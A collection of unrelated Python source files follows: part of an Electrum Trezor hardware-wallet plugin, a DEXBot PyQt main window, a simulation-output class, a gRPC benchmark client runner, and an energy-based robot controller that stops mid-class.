strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return InputScriptType.SPENDMULTISIG
if electrum_txin_type in ('p2tr',):
return InputScriptType.SPENDTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return OutputScriptType.PAYTOMULTISIG
if electrum_txin_type in ('p2tr',):
return OutputScriptType.PAYTOTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
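    # For illustration: with the mapping above, the native-segwit Electrum txin
    # type 'p2wpkh' becomes InputScriptType.SPENDWITNESS on inputs and
    # OutputScriptType.PAYTOWITNESS on outputs, while legacy 'p2pkh' becomes
    # SPENDADDRESS / PAYTOADDRESS.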
def get_trezor_amount_unit(self):
if self.config.decimal_point == 0:
return AmountUnit.SATOSHI
elif self.config.decimal_point == 2:
return AmountUnit.MICROBITCOIN
elif self.config.decimal_point == 5:
return AmountUnit.MILLIBITCOIN
else:
return AmountUnit.BITCOIN
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures, _ = client.sign_tx(self.get_coin_name(),
inputs, outputs,
lock_time=tx.locktime,
version=tx.version,
amount_unit=self.get_trezor_amount_unit(),
prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
if txin.is_coinbase_input():
txinputtype = TxInputType(
prev_hash=b"\x00"*32,
prev_index=0xffffffff, # signed int -1
)
else:
txinputtype = TxInputType(
prev_hash=txin.prevout.txid,
prev_index=txin.prevout.out_idx,
)
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
txinputtype.multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
txinputtype.script_type = self.get_trezor_input_script_type(txin.script_type)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
txinputtype.amount = txin.value_sats()
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
if address:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOADDRESS,
address=address,
)
else:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOOPRETURN,
op_return_data=trezor_validate_op_return_output_and_get_data(txout),
)
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
worker_list.py
|
import time
import webbrowser
from threading import Thread
from grapheneapi.exceptions import NumRetriesReached
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtGui import QFontDatabase
from PyQt5.QtWidgets import QMainWindow
from dexbot import __version__
from dexbot.config import Config
from dexbot.controllers.wallet_controller import WalletController
from dexbot.qt_queue.idle_queue import idle_add
from dexbot.qt_queue.queue_dispatcher import ThreadDispatcher
from dexbot.views.create_wallet import CreateWalletView
from dexbot.views.create_worker import CreateWorkerView
from dexbot.views.errors import gui_error
from dexbot.views.layouts.flow_layout import FlowLayout
from dexbot.views.settings import SettingsView
from dexbot.views.ui.worker_list_window_ui import Ui_MainWindow
from dexbot.views.unlock_wallet import UnlockWalletView
from dexbot.views.worker_item import WorkerItemWidget
class MainView(QMainWindow, Ui_MainWindow):
def __init__(self, main_controller):
super().__init__()
self.setupUi(self)
self.main_controller = main_controller
self.config = main_controller.config
self.max_workers = 10
self.num_of_workers = 0
self.worker_widgets = {}
self.closing = False
self.status_bar_updater = None
self.statusbar_updater_first_run = True
self.main_controller.set_info_handler(self.set_worker_status)
self.layout = FlowLayout(self.scrollAreaContent)
self.dispatcher = None
# GUI buttons
self.add_worker_button.clicked.connect(self.handle_add_worker)
self.settings_button.clicked.connect(self.handle_open_settings)
self.help_button.clicked.connect(self.handle_open_documentation)
self.unlock_wallet_button.clicked.connect(self.handle_login)
# Hide certain buttons by default until login success
self.add_worker_button.hide()
self.status_bar.showMessage("ver {} - Node disconnected".format(__version__))
QFontDatabase.addApplicationFont(":/bot_widget/font/SourceSansPro-Bold.ttf")
def connect_to_bitshares(self):
# Check if there is already a connection
if self.config['node']:
# Test nodes first. This only checks if we're able to connect
self.status_bar.showMessage('Connecting to Bitshares...')
try:
self.main_controller.measure_latency(self.config['node'])
except NumRetriesReached:
self.status_bar.showMessage(
                    'ver {} - Couldn\'t connect to Bitshares. '
'Please use different node(s) and retry.'.format(__version__)
)
self.main_controller.set_bitshares_instance(None)
return False
self.main_controller.new_bitshares_instance(self.config['node'])
self.status_bar.showMessage(self.get_statusbar_message())
return True
else:
# Config has no nodes in it
self.status_bar.showMessage(
'ver {} - Node(s) not found. ' 'Please add node(s) from settings.'.format(__version__)
)
return False
@pyqtSlot(name='handle_login')
def handle_login(self):
if not self.main_controller.bitshares_instance:
if not self.connect_to_bitshares():
return
wallet_controller = WalletController(self.main_controller.bitshares_instance)
if wallet_controller.wallet_created():
unlock_view = UnlockWalletView(wallet_controller)
else:
unlock_view = CreateWalletView(wallet_controller)
if unlock_view.exec_():
# Hide button once successful wallet creation / login
self.unlock_wallet_button.hide()
self.add_worker_button.show()
# Load worker widgets from config file
workers = self.config.workers_data
for worker_name in workers:
self.add_worker_widget(worker_name)
# Limit the max amount of workers so that the performance isn't greatly affected
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
break
# Dispatcher polls for events from the workers that are used to change the ui
self.dispatcher = ThreadDispatcher(self)
self.dispatcher.start()
self.status_bar.showMessage("ver {} - Node delay: - ms".format(__version__))
self.status_bar_updater = Thread(target=self._update_statusbar_message)
self.status_bar_updater.start()
def add_worker_widget(self, worker_name):
config = self.config.get_worker_config(worker_name)
widget = WorkerItemWidget(worker_name, config, self.main_controller, self)
widget.setFixedSize(widget.frameSize())
self.layout.addWidget(widget)
self.worker_widgets[worker_name] = widget
# Limit the max amount of workers so that the performance isn't greatly affected
self.num_of_workers += 1
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
def remove_worker_widget(self, worker_name):
self.worker_widgets.pop(worker_name, None)
self.num_of_workers -= 1
if self.num_of_workers < self.max_workers:
self.add_worker_button.setEnabled(True)
def change_worker_widget_name(self, old_worker_name, new_worker_name):
worker_data = self.worker_widgets.pop(old_worker_name)
self.worker_widgets[new_worker_name] = worker_data
@pyqtSlot(name='handle_add_worker')
@gui_error
def handle_add_worker(self):
create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)
return_value = create_worker_dialog.exec_()
# User clicked save
if return_value == 1:
worker_name = create_worker_dialog.worker_name
self.main_controller.create_worker(worker_name)
self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)
self.add_worker_widget(worker_name)
@pyqtSlot(name='handle_open_settings')
@gui_error
def handle_open_settings(self):
settings_dialog = SettingsView()
reconnect = settings_dialog.exec_()
if reconnect:
# Reinitialize config after closing the settings window
self.config = Config()
self.main_controller.config = self.config
self.connect_to_bitshares()
@staticmethod
@pyqtSlot(name='handle_open_documentation')
def handle_open_documentation():
webbrowser.open('https://github.com/Codaone/DEXBot/wiki')
def set_worker_name(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_name(value)
def set_worker_account(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_account(value)
def set_worker_profit(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_profit(value)
def set_worker_market(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_market(value)
def set_worker_slider(self, worker_name, value):
self.worker_widgets[worker_name].set_worker_slider(value)
def customEvent(self, event):
# Process idle_queue_dispatcher events
event.callback()
def closeEvent(self, event):
self.closing = True
self.status_bar.showMessage("Closing app...")
if self.status_bar_updater and self.status_bar_updater.is_alive():
self.status_bar_updater.join()
def _update_statusbar_message(self):
while not self.closing:
            # On the first run the workers are still contending for the connection,
            # so wait briefly before querying it to get accurate information
if self.statusbar_updater_first_run:
self.statusbar_updater_first_run = False
time.sleep(1)
msg = self.get_statusbar_message()
idle_add(self.set_statusbar_message, msg)
runner_count = 0
# Wait for 30s but do it in 0.5s pieces to not prevent closing the app
while not self.closing and runner_count < 60:
runner_count += 1
time.sleep(0.5)
def get_statusbar_message(self):
node = self.main_controller.bitshares_instance.rpc.url
try:
latency = self.main_controller.measure_latency(node)
except BaseException:
latency = -1
if latency != -1:
return "ver {} - Node delay: {:.2f}ms - node: {}".format(__version__, latency, node)
else:
return "ver {} - Node disconnected".format(__version__)
def set_statusbar_message(self, msg):
self.status_bar.showMessage(msg)
def set_worker_status(self, worker_name, level, status):
if worker_name != 'NONE':
worker = self.worker_widgets.get(worker_name, None)
if worker:
worker.set_status(status)
|
output.py
|
from dgdynamic.utils.project_utils import LogMixin, make_directory
from dgdynamic.config.settings import config
from dgdynamic.utils.plotter import matplotlib_plot
from scipy.interpolate import interpolate
import threading
import time
import csv
import matplotlib.pyplot as plt
import os.path
import enum
import collections.abc
import array
import numpy
class SimulationOutput(LogMixin):
def __init__(self, solved_by, user_sim_range, symbols, dependent=(), independent=(), ignore=(),
solver_method=None, errors=(),):
self.dependent = numpy.asanyarray(dependent, dtype=float)
self.independent = numpy.asanyarray(independent, dtype=float)
self.errors = errors
self.solver_used = solved_by
self.solver_method_used = solver_method
self.requested_simulation_range = user_sim_range
if independent is not None and len(independent) >= 2:
self.simulation_duration = abs(independent[-1] - independent[0])
elif independent is not None and len(independent) == 1:
self.simulation_duration = independent[0]
else:
self.simulation_duration = 0.0
try:
self._ignored = tuple(item[1] for item in ignore)
except IndexError:
self._ignored = ignore
self._path = os.path.abspath(config['Output Paths']['DATA_DIRECTORY'])
self._file_writer_thread = None
        self.symbols = tuple(symbols) if isinstance(symbols, collections.abc.Generator) else symbols
def has_sim_prematurely_stopped(self, rel_tol=1e-05, abs_tol=1e-08):
if len(self.independent) > 0:
return not numpy.isclose(self.independent[-1], self.requested_simulation_range[1],
rtol=rel_tol, atol=abs_tol)
else:
return self.requested_simulation_range[1] != 0
def is_data_evenly_spaced(self, rel_tol=1e-05, abs_tol=1e-08):
delta_t = 0
time_vals = self.independent
if len(time_vals) >= 2:
delta_t = abs(time_vals[1] - time_vals[0])
for i in range(1, len(time_vals)):
curr_t = time_vals[i]
if i < len(time_vals) - 1:
next_t = time_vals[i + 1]
curr_dt = abs(next_t - curr_t)
if not numpy.isclose(curr_dt, delta_t, rtol=rel_tol, atol=abs_tol):
return False
return True
def interpolate_data(self, new_sample_resolution, kind='linear'):
"""Shall return a new evenly spaced interpolated version of the original output"""
if new_sample_resolution > 0:
new_independent = numpy.linspace(self.independent[0], self.independent[-1], num=new_sample_resolution)
interpolation_func = interpolate.interp1d(self.independent, self.dependent, axis=0, kind=kind)
return SimulationOutput(self.solver_used, self.requested_simulation_range, self.symbols,
dependent=interpolation_func(new_independent), independent=new_independent,
ignore=self._ignored, solver_method=self.solver_method_used, errors=self.errors)
return self
@property
def is_output_set(self):
return False
@property
def has_errors(self):
return len(self.errors) > 0
@property
def is_empty(self):
return len(self.independent) + len(self.dependent) == 0
@property
def dependent_dimension(self):
return len(self.dependent[0])
def plot(self, filename=None, labels=None, figure_size=None, axis_labels=None,
axis_limits=None, title=None, show_grid=True, has_tight_layout=True):
if title is None and isinstance(self.solver_used, (str, enum.Enum)):
if isinstance(self.solver_used, enum.Enum):
title = self.solver_used.name.title()
else:
title = self.solver_used
if self.solver_method_used is not None:
title += (" - " + self.solver_method_used.name)
input_values = {
'independent': self.independent,
'dependent': self.dependent,
'symbols': self.symbols,
'ignored': self._ignored,
'title': title,
'filename': filename,
'labels': labels,
'figure_size': figure_size,
'axis_labels': axis_labels,
'axis_limits': axis_limits,
'show_grid': show_grid,
'has_tight_layout': has_tight_layout,
}
matplotlib_plot(input_values)
return self
@staticmethod
def show(*args, **kwargs):
plt.show(*args, **kwargs)
def _get_file_prefix(self, name, extension=".tsv", prefix=None):
if prefix is None:
return os.path.join(self._path, "{}_{}{}".format(self.solver_used.value, name, extension))
else:
return os.path.join(self._path, "{}{}{}".format(prefix, name, extension))
def _filter_out_ignores(self):
for rows in self.dependent:
filtered_row = ()
for index, item in enumerate(rows):
if index not in self._ignored:
filtered_row += (item,)
yield filtered_row
@property
def filtered_output(self):
return SimulationOutput(self.solver_used,
dependent=tuple(self._filter_out_ignores()),
independent=self.independent, ignore=(),
solver_method=self.solver_method_used,
symbols=self.symbols, errors=self.errors,
user_sim_range=self.requested_simulation_range)
def save(self, filename, prefix=None, unfiltered=False, labels=None, stream=None):
"""
        Saves the independent and dependent variables as a Tab-Separated Values (TSV) file in the directory specified
        by the DATA_DIRECTORY variable in the configuration file. The name of the TSV file is constructed by
        concatenating the ODE solver name, an underscore, the 'filename' parameter and finally the file
        extension.
:param prefix: name prefix for the data file. Default is the plugin name followed by an underscore.
:param unfiltered: whether to mark 'unchanging species' in the output data set
:param filename: a name for the data file
:param stream: use another stream than a file stream
:param labels: use custom header labels for species. Default is the symbols specified by the model.
:return:
"""
float_precision = config.getint('Simulation', 'FIXED_POINT_PRECISION', fallback=18)
if len(self.dependent) == 0 or len(self.independent) == 0:
            self._logger.warning("No or mismatched data")
return
if unfiltered:
paired_data = zip(self.independent, self.dependent)
else:
paired_data = zip(self.independent, self._filter_out_ignores())
make_directory(config['Output Paths']['DATA_DIRECTORY'], pre_delete=False)
if unfiltered:
dependent_dimension = self.dependent_dimension
else:
dependent_dimension = max(self.dependent_dimension - len(self._ignored), 0)
self._logger.debug("Dimension of the dependent variable is {}".format(dependent_dimension))
header_labels = self.symbols if labels is None else labels
assert isinstance(header_labels, (list, set, tuple))
def header():
yield "time"
for index, label in enumerate(header_labels):
if unfiltered and index in self._ignored:
yield "_{}".format(label)
else:
yield label
def format_float(variable):
return "{:.{}f}".format(variable, float_precision)
def data_rows():
for independent, dependent in paired_data:
yield (format_float(independent),) + tuple(format_float(var) for var in dependent)
if stream is None:
file_path = self._get_file_prefix(filename, prefix=prefix)
self._logger.info("Saving data as {}".format(file_path))
stream = open(file_path, mode="w")
def write_data():
self._logger.info("Started on writing data to disk")
start_t = time.time()
with stream as outfile:
# write the header; an underscore prefix marks columns that were ignored (ODE only, since SPiM
# doesn't output data for a variable that is not in the plot directive)
writer = csv.writer(outfile, delimiter="\t")
writer.writerow(element for element in header())
for row in data_rows():
writer.writerow(row)
end_t = time.time()
self._logger.info("Finished writing to disk. Took: {} secs".format(end_t - start_t))
self._file_writer_thread = threading.Thread(target=write_data)
self._file_writer_thread.start()
return self
def __getitem__(self, index):
return self.independent[index], self.dependent[index]
def __iter__(self):
for i in range(len(self.independent)):
yield self.independent[i], self.dependent[i]
def __len__(self):
return (len(self.independent) + len(self.dependent)) // 2
def __str__(self):
return "independent variable: {}\ndependent variable: {}".format(self.independent,
self.dependent)
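# A minimal usage sketch for the SimulationOutput API above, assuming `output` is an
# already-populated instance; the file names and title below are illustrative only.
def _example_output_usage(output):
    output.plot(filename="run_01.png", title="Example run")  # render the trajectories
    output.save("run_01")                                     # TSV is written on a background thread
    output._file_writer_thread.join()                         # wait for the writer to finish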
class SimulationOutputSet(LogMixin):
def __init__(self, output):
self.output_set = tuple(output)
def plot(self, filename=None, **kwargs):
if isinstance(filename, collections.Iterable):
for filename, output in zip(filename, self.output_set):
output.plot(filename=filename, **kwargs)
elif filename is None:
for output in self.output_set:
output.plot(filename=filename, **kwargs)
else:
raise TypeError("Expected an iterable collection of file names; got {}"
.format(type(filename)))
return self
def save(self, filename, **kwargs):
if isinstance(filename, collections.Iterable):
for filename, output in zip(filename, self.output_set):
output.save(filename=filename, **kwargs)
else:
raise TypeError("Expected an iterable collection of file names; got {}"
.format(type(filename)))
return self
@property
def is_output_set(self):
return True
@property
def filtered_output(self):
return SimulationOutputSet((out.filtered_output for out in self.output_set))
@property
def data_matrix(self):
return tuple((array.array('d', column) for column in out.columns) for out in self.output_set)
@property
def failure_indices(self):
return tuple(i for i, o in enumerate(self.output_set) if o.has_errors)
@property
def failures(self):
return SimulationOutputSet(filter(lambda obj: obj.has_errors, self.output_set))
@property
def successes(self):
return SimulationOutputSet(filter(lambda obj: not obj.has_errors, self.output_set))
def __iter__(self):
return self.output_set.__iter__()
def __getitem__(self, key):
return self.output_set.__getitem__(key)
def __len__(self):
return self.output_set.__len__()
def __repr__(self):
return "<SimulationOutputSet with {} runs>".format(self.__len__())
|
client_runner.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines behavior for WHEN clients send requests.
Each client exposes a non-blocking send_request() method that the
ClientRunner invokes either periodically or in response to some event.
"""
import abc
import threading
import time
class ClientRunner:
"""Abstract interface for sending requests from clients."""
__metaclass__ = abc.ABCMeta
def __init__(self, client):
self._client = client
@abc.abstractmethod
def start(self):
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
raise NotImplementedError()
class OpenLoopClientRunner(ClientRunner):
def __init__(self, client, interval_generator):
super(OpenLoopClientRunner, self).__init__(client)
self._is_running = False
self._interval_generator = interval_generator
self._dispatch_thread = threading.Thread(
target=self._dispatch_requests, args=())
def start(self):
self._is_running = True
self._client.start()
self._dispatch_thread.start()
def stop(self):
self._is_running = False
self._client.stop()
self._dispatch_thread.join()
self._client = None
def _dispatch_requests(self):
while self._is_running:
self._client.send_request()
time.sleep(next(self._interval_generator))
class ClosedLoopClientRunner(ClientRunner):
def __init__(self, client, request_count):
super(ClosedLoopClientRunner, self).__init__(client)
self._is_running = False
self._request_count = request_count
# Send a new request on each response for closed loop
self._client.add_response_callback(self._send_request)
def start(self):
self._is_running = True
self._client.start()
for _ in xrange(self._request_count):
self._client.send_request()
def stop(self):
self._is_running = False
self._client.stop()
self._client = None
def _send_request(self, client, response_time):
if self._is_running:
client.send_request()
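# A hedged sketch of how OpenLoopClientRunner might be driven: the interval generator only
# has to yield sleep times, so exponential inter-arrival times (a Poisson arrival process)
# give a fixed average request rate. The `qps` value and the commented-out client are
# illustrative assumptions, not part of this module.
def poisson_intervals(qps):
    """Yield exponentially distributed inter-arrival times for a target request rate."""
    import random
    while True:
        yield random.expovariate(qps)
# runner = OpenLoopClientRunner(some_client, poisson_intervals(qps=100.0))
# runner.start(); ...; runner.stop()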
|
cep_control_lefthand_base.py
|
import torch
import torch.autograd as autograd
import numpy as np
from cep.utils import torch2numpy, numpy2torch
import torch.nn as nn
from cep.optimizer import RWR
from cep.maps import Map
import time, copy
# from torch.multiprocessing import Pool
# torch.multiprocessing.set_start_method('fork', force=True)
# todo: Use Sympy for systems evolution
def solve_euler(q, dq, dt):
return q + dq * dt
class Multi_EBMControl():
def __init__(self, energy_tree, device, dim=9, dt=0.01, optimization_steps=10, n_particles=10000, var_0=10., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1)
self.log_p_dq = torch.zeros((n_particles)) # TODO: 06.28
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state, stochastic=False):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivariate Gaussian distribution, self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
#self.energy_tree.set_context(state)
for jj in range(len(self.energy_tree)): # TODO: 06.28
self.energy_tree[jj].set_context(state)
# for et in self.energy_tree:
# et.set_context(state)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action()
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device)*self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
# for ii in range(0, len(self.energy_tree)): # TODO: 06.28
# tmp = torch.clone(self.energy_tree[ii].log_prob(action))
# self.log_p_dq = tmp + self.log_p_dq
#
# for et in self.energy_tree:
# self.log_p_dq += et.log_prob(action)
self.log_p_dq = .05 * self.energy_tree[0].log_prob(action) + .95 * self.energy_tree[1].log_prob(action) # TODO: 07.10 FIX jscAndGoto!
#log_p_dq = self.energy_tree.log_prob(action) # Energy, torch.Size([1000]) # TODO: 06.28
t2 = time.time()
mu, var = self.optimizer.optimize(action, self.log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EBMControl():
def __init__(self, energy_tree, device, dim=9, dt=0.005, optimization_steps=100, n_particles=10000, var_0=1., stochastic=False):
self.device = device
self.energy_tree = energy_tree
self.dim = dim
## Controller ##
self.stochastic = stochastic
### Optimization ##
self.optimization_steps = optimization_steps
self.n_particles = n_particles
self.var_0 = var_0
self.optimizer = RWR(beta=0.1) # TODO: Maybe try different Black-box algorithms
## Position Action ##
self.dt = dt
def policy(self, state):
## 1. State to Torch ##
state_t = numpy2torch(state, self.device)
## 2.Compute Action ##
action_t = self.get_action(state_t, stochastic=self.stochastic) # torch.Size([7])
## 3. action2numpy
if action_t is None:
print('block')
action = torch2numpy(action_t)
return action
def get_action(self, state, stochastic=False):
## 1. Conditioning ##
t0 = time.time()
# TODO: initialize/update Multivariate Gaussian distribution, self.p_dx = tdist.MultivariateNormal(mu, self.var) in TaskgotoLeaf
self.energy_tree.set_context(state)
## 2. Compute optimal Action ##
t1 = time.time()
a_opt = self.compute_optimal_action()
t2 = time.time()
#print('inter1: {}, inter 2: {}'.format(t1-t0, t2-t1))
return a_opt
def compute_optimal_action(self):
mu = torch.zeros(self.dim).to(self.device)
std = torch.eye(self.dim).to(self.device) * self.var_0
self.optimizer.init_optimization()
white_noise = torch.randn(self.n_particles, self.dim).to(self.device)
for i in range(self.optimization_steps):
t0 = time.time()
action = torch.matmul(std, white_noise.T).T + mu # Random sample, torch.Size([1000, 7])
t1 = time.time()
log_p_dq = self.energy_tree.log_prob(action) # Energy, torch.Size([1000]) # TODO:
t2 = time.time()
mu, var = self.optimizer.optimize(action, log_p_dq) # Update mu and var based on sampled action and energy
# mu, var -> torch.Size([7])
t3 = time.time()
#print('int 1: {}, int 2: {}, int3: {}'.format(t1-t0,t2-t1,t3-t2))
std = torch.diag(torch.sqrt(var)) # torch.Size([7, 7])
return self.optimizer.best_solution.x_optima # torch.Size([7])
class EnergyTree(nn.Module):
'''
An Energy Tree is the base node of a Tree. It will be composed of a Mapping, that transforms state and action to some latent state
and branches
'''
